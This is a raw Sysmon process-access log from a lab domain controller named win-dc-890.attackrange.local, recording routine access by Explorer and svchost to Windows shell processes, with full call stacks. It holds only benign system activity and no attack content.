07:45:00.674{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.674{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.658{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.658{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.636{466BC892-32D3-60E8-770B-00000000CF01}63568748C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.636{466BC892-32D3-60E8-770B-00000000CF01}63568748C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046239Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046238Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046237Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046236Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0D00-00000000CF01}9005708C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046235Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001046234Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046233Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046232Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046231Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046230Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046229Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046228Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046227Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046226Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:00.621{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046225Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
